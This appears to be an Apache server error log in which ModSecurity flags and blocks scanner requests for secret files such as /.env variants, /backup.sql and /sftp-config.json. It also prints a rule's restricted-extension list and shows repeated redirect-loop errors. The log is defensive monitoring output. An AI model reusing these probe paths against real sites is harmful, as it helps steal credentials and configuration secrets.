[Mon May 11 13:26:21.707913 2026] [security2:error] [pid 1319885:tid 1319918] [client 172.70.248.24:13773] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/.env.backup"] [unique_id "agG83VchVQ3tCn0m9Oox_AAAARA"]
[Mon May 11 13:26:21.708152 2026] [security2:error] [pid 1319885:tid 1319918] [client 172.70.248.24:13773] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/.env.backup"] [unique_id "agG83VchVQ3tCn0m9Oox_AAAARA"]
[Mon May 11 13:26:21.977206 2026] [security2:error] [pid 1319998:tid 1320018] [client 172.70.243.205:9317] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.vercel"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/.env.vercel"] [unique_id "agG83at2WtvoFr7xvGyuOAAAAJI"]
[Mon May 11 13:26:21.977455 2026] [security2:error] [pid 1319998:tid 1320018] [client 172.70.243.205:9317] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/.env.vercel"] [unique_id "agG83at2WtvoFr7xvGyuOAAAAJI"]
[Mon May 11 13:26:21.981542 2026] [security2:error] [pid 1319885:tid 1319890] [client 172.70.243.205:9325] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/.env.dev"] [unique_id "agG83VchVQ3tCn0m9Oox_gAAAQI"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:21.981822 2026] [security2:error] [pid 1319885:tid 1319890] [client 172.70.243.205:9325] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/.env.dev"] [unique_id "agG83VchVQ3tCn0m9Oox_gAAAQI"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:22.452799 2026] [security2:error] [pid 1320674:tid 1320697] [client 162.158.94.191:10146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/.env.save"] [unique_id "agG83qO9RdIr1DwxYR1tKgAAAMc"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:22.453083 2026] [security2:error] [pid 1320674:tid 1320697] [client 162.158.94.191:10146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/.env.save"] [unique_id "agG83qO9RdIr1DwxYR1tKgAAAMc"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:22.477323 2026] [security2:error] [pid 1319998:tid 1320003] [client 162.158.94.191:10154] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/.env.development.local"] [unique_id "agG83qt2WtvoFr7xvGyuOwAAAIM"]
[Mon May 11 13:26:22.477588 2026] [security2:error] [pid 1319998:tid 1320003] [client 162.158.94.191:10154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/.env.development.local"] [unique_id "agG83qt2WtvoFr7xvGyuOwAAAIM"]
[Mon May 11 13:26:22.556394 2026] [security2:error] [pid 1319886:tid 1319909] [client 162.158.110.22:12310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agG83ay-5-wpj6Sx56ZyogAAAAc"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:23.144481 2026] [security2:error] [pid 1319998:tid 1320016] [client 172.71.144.156:11724] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agG83at2WtvoFr7xvGyuNwAAAJA"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:23.183335 2026] [security2:error] [pid 1319953:tid 1319963] [client 172.69.150.143:9911] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agG83eSQ-m-m0ukSShtbfwAAAUg"]
[Mon May 11 13:26:23.202683 2026] [security2:error] [pid 1319885:tid 1319918] [client 172.70.248.24:13773] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agG83VchVQ3tCn0m9Oox_AAAARA"]
[Mon May 11 13:26:23.249410 2026] [security2:error] [pid 1319886:tid 1319913] [client 172.70.248.24:13770] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agG83ay-5-wpj6Sx56ZypAAAAAk"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:23.450042 2026] [security2:error] [pid 1319998:tid 1320018] [client 172.70.243.205:9317] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agG83at2WtvoFr7xvGyuOAAAAJI"]
[Mon May 11 13:26:23.513656 2026] [security2:error] [pid 1319885:tid 1319890] [client 172.70.243.205:9325] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agG83VchVQ3tCn0m9Oox_gAAAQI"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:23.921137 2026] [security2:error] [pid 1319998:tid 1320003] [client 162.158.94.191:10154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agG83qt2WtvoFr7xvGyuOwAAAIM"]
[Mon May 11 13:26:23.930383 2026] [security2:error] [pid 1320674:tid 1320697] [client 162.158.94.191:10146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agG83qO9RdIr1DwxYR1tKgAAAMc"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:24.099441 2026] [security2:error] [pid 1319885:tid 1319912] [client 172.71.148.47:11655] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "krakoukas.com"] [uri "/backup.sql"] [unique_id "agG84FchVQ3tCn0m9OoyCwAAAQ4"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:24.099991 2026] [security2:error] [pid 1319885:tid 1319912] [client 172.71.148.47:11655] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/backup.sql"] [unique_id "agG84FchVQ3tCn0m9OoyCwAAAQ4"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:24.101573 2026] [security2:error] [pid 1320398:tid 1320420] [client 172.71.148.46:11505] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/sftp-config.json"] [unique_id "agG84OJEyNRN152ArORjYAAAAFQ"]
[Mon May 11 13:26:24.101769 2026] [security2:error] [pid 1320398:tid 1320420] [client 172.71.148.46:11505] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/sftp-config.json"] [unique_id "agG84OJEyNRN152ArORjYAAAAFQ"]
[Mon May 11 13:26:25.468638 2026] [security2:error] [pid 1319885:tid 1319912] [client 172.71.148.47:11655] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agG84FchVQ3tCn0m9OoyCwAAAQ4"], referer: https://www.google.com/search?q=krakoukas.com
[Mon May 11 13:26:25.492239 2026] [security2:error] [pid 1320398:tid 1320420] [client 172.71.148.46:11505] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agG84OJEyNRN152ArORjYAAAAFQ"]
[Mon May 11 13:26:31.232198 2026] [core:error] [pid 1319953:tid 1319974] [client 20.151.0.198:14472] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:31.232239 2026] [core:error] [pid 1319953:tid 1319974] [client 20.151.0.198:14472] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:41.054130 2026] [core:error] [pid 1319953:tid 1319971] [client 20.151.0.198:61912] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:41.054173 2026] [core:error] [pid 1319953:tid 1319971] [client 20.151.0.198:61912] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:47.940917 2026] [core:error] [pid 1319953:tid 1319977] [client 20.151.0.198:43446] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:47.940954 2026] [core:error] [pid 1319953:tid 1319977] [client 20.151.0.198:43446] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:50.911474 2026] [core:error] [pid 1319886:tid 1319937] [client 20.151.0.198:61900] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:50.921320 2026] [core:error] [pid 1319886:tid 1319937] [client 20.151.0.198:61900] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:53.648907 2026] [core:error] [pid 1319885:tid 1319890] [client 20.151.0.198:61911] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:53.648940 2026] [core:error] [pid 1319885:tid 1319890] [client 20.151.0.198:61911] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:56.184420 2026] [core:error] [pid 1319885:tid 1319935] [client 20.151.0.198:14377] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:56.184451 2026] [core:error] [pid 1319885:tid 1319935] [client 20.151.0.198:14377] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:57.601412 2026] [security2:error] [pid 1319885:tid 1319891] [client 86.105.185.182:50905] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG9AVchVQ3tCn0m9OoyNwAAAQM"], referer: https://www.piregwan-genesis.com/
[Mon May 11 13:26:57.866763 2026] [security2:error] [pid 1319998:tid 1320017] [client 43.156.117.41:35694] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "domaine-de-janasse.com"] [uri "/"] [unique_id "agG9Aat2WtvoFr7xvGyuvAAAAJE"]
[Mon May 11 13:26:58.274574 2026] [core:error] [pid 1319886:tid 1319921] [client 20.151.0.198:52051] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:26:58.274606 2026] [core:error] [pid 1319886:tid 1319921] [client 20.151.0.198:52051] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:00.958221 2026] [core:error] [pid 1319886:tid 1319908] [client 20.151.0.198:52052] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:00.958252 2026] [core:error] [pid 1319886:tid 1319908] [client 20.151.0.198:52052] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:05.633311 2026] [core:error] [pid 1319886:tid 1319934] [client 20.151.0.198:14382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:05.633349 2026] [core:error] [pid 1319886:tid 1319934] [client 20.151.0.198:14382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:08.030589 2026] [core:error] [pid 1320674:tid 1320709] [client 20.151.0.198:43453] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:08.031985 2026] [core:error] [pid 1320674:tid 1320709] [client 20.151.0.198:43453] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:09.284530 2026] [core:error] [pid 1319885:tid 1319915] [client 20.151.0.198:43422] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:09.284567 2026] [core:error] [pid 1319885:tid 1319915] [client 20.151.0.198:43422] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:11.110172 2026] [core:error] [pid 1320674:tid 1321055] [client 20.151.0.198:52090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:11.110272 2026] [core:error] [pid 1320674:tid 1321055] [client 20.151.0.198:52090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:13.991948 2026] [core:error] [pid 1320674:tid 1320699] [client 20.151.0.198:14398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:13.991985 2026] [core:error] [pid 1320674:tid 1320699] [client 20.151.0.198:14398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:16.831678 2026] [core:error] [pid 1319953:tid 1319977] [client 20.151.0.198:43400] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:16.831714 2026] [core:error] [pid 1319953:tid 1319977] [client 20.151.0.198:43400] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:21.880533 2026] [core:error] [pid 1319953:tid 1319967] [client 20.151.0.198:61908] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:21.880634 2026] [core:error] [pid 1319953:tid 1319967] [client 20.151.0.198:61908] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:23.261510 2026] [core:error] [pid 1319885:tid 1319904] [client 20.151.0.198:43430] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:23.261537 2026] [core:error] [pid 1319885:tid 1319904] [client 20.151.0.198:43430] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:24.196625 2026] [core:error] [pid 1319886:tid 1319902] [client 20.151.0.198:52058] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
